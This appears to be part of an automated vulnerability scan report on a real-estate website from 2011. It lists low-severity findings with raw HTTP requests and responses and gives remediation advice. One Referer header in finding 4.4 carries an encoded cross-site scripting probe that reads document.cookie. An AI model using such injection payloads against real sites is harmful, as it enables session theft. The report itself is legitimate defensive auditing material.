3.4. http://www.newenglandmoves.com/accounts/register  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /accounts/register

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /accounts/register HTTP/1.1
Host: www.newenglandmoves.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; __utmz=63899184.1294253524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63899184.1764409909.1294253524.1294253524.1294253524.1; __utmc=63899184; __utmb=63899184.1.10.1294253524;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 19:02:09 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 37
ETag: "fde28716c0e616f217cc5cf02b0ba766"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; path=/; expires=Wed, 05 Jan 2011 20:02:09 GMT; HttpOnly
Content-Length: 24672
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-equiv="cont
...[SNIP]...
<div class="account_registration">

<form action="/accounts/register" class="new_account" id="account_registration" method="post"><div style="margin:0;padding:0;display:inline">
...[SNIP]...
</label>
<input id="account_password" maxlength="30" name="account[password]" size="30" tabindex="2" type="password" />
</div>
...[SNIP]...
</label>
<input id="account_password_confirmation" maxlength="30" name="account[password_confirmation]" size="30" tabindex="3" type="password" />
</div>
...[SNIP]...

4. Email addresses disclosed  previous  next
There are 4 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


4.1. http://www.newenglandmoves.com/careers/real-estate-license-courses  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /careers/real-estate-license-courses

Issue detail

The following email address was disclosed in the response:

Request

GET /careers/real-estate-license-courses HTTP/1.1
Host: www.newenglandmoves.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; __utmz=63899184.1294253524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63899184.1764409909.1294253524.1294253524.1294253524.1; __utmc=63899184; __utmb=63899184.1.10.1294253524;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 19:02:05 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 90
ETag: "f9e7f260d61582b8aae469fabca35542"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; path=/; expires=Wed, 05 Jan 2011 20:02:05 GMT; HttpOnly
Content-Length: 32254
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-equiv="
...[SNIP]...
<a href="mailto:cbrblicensingschool@nemoves.com">cbrblicensingschool@nemoves.com</a>
...[SNIP]...
<a href="mailto:cbrblicensingschool@nemoves.com">cbrblicensingschool@nemoves.com</a>
...[SNIP]...
<a href="mailto:cbrblicensingschool@nemoves.com">cbrblicensingschool@nemoves.com</a>
...[SNIP]...
<a href="mailto:cbrblicensingschool@nemoves.com">cbrblicensingschool@nemoves.com</a>
...[SNIP]...

4.2. http://www.newenglandmoves.com/contact_us/email_us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /contact_us/email_us

Issue detail

The following email address was disclosed in the response:

Request

GET /contact_us/email_us HTTP/1.1
Host: www.newenglandmoves.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; __utmz=63899184.1294253524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63899184.1764409909.1294253524.1294253524.1294253524.1; __utmc=63899184; __utmb=63899184.1.10.1294253524;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 19:01:34 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 30
ETag: "93e02731285b8b6ea90fc773dfeafc81"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; path=/; expires=Wed, 05 Jan 2011 20:01:34 GMT; HttpOnly
Content-Length: 21843
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">

<head>
<meta http-equiv="cont
...[SNIP]...
<option value="sar">Careers@NewEnglandMoves.com</option>
...[SNIP]...

4.3. http://www.newenglandmoves.com/javascripts/cached_base.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /javascripts/cached_base.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/cached_base.js?1279159540 HTTP/1.1
Host: www.newenglandmoves.com
Proxy-Connection: keep-alive
Referer: http://www.newenglandmoves.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 18:52:27 GMT
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Thu, 15 Jul 2010 02:21:21 GMT
ETag: "61d23-214a5-48b63c222dd4a"
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 136357

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

4.4. http://www.newenglandmoves.com/javascripts/jquery.hoverIntent.min.js  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newenglandmoves.com
Path:   /javascripts/jquery.hoverIntent.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /javascripts/jquery.hoverIntent.min.js?1269662485 HTTP/1.1
Host: www.newenglandmoves.com
Proxy-Connection: keep-alive
Referer: http://www.newenglandmoves.com/real-estate/sales-associates19775%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef09e84b144
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=63899184.1294253524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=63899184.1764409909.1294253524.1294253524.1294253524.1; __utmb=63899184.1.10.1294253524; _sid=b720a5b9e00f38f151dd99e693e2aac2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 19:09:21 GMT
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Sat, 27 Mar 2010 04:01:41 GMT
ETag: "61cad-649-482c0565fbed3"
Accept-Ranges: bytes
Vary: Accept-Encoding
Connection: close
Content-Type: application/javascript
Content-Length: 1609

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

5. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.newenglandmoves.com
Path:   /locations.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /locations.js HTTP/1.1
Host: www.newenglandmoves.com
Proxy-Connection: keep-alive
Referer: http://www.newenglandmoves.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 18:52:27 GMT
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.11
X-Runtime: 10
ETag: "0bb7111de43cb24c2335e9aa750238eb"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _sid=b720a5b9e00f38f151dd99e693e2aac2; path=/; expires=Wed, 05 Jan 2011 19:52:27 GMT; HttpOnly
Status: 200
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript; charset=utf-8
Content-Length: 86440


zipcodesAutocompleteRawData = "01001,Agawam,MA|01002,Amherst,MA|01003,Amherst,MA|01004,Amherst,MA|01005,Barre,MA|01007,Belchertown,MA|01008,Blandford,MA|01009,Bondsville,MA|01010,Brimfield,MA|01011,C
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Wed Jan 05 13:11:37 CST 2011.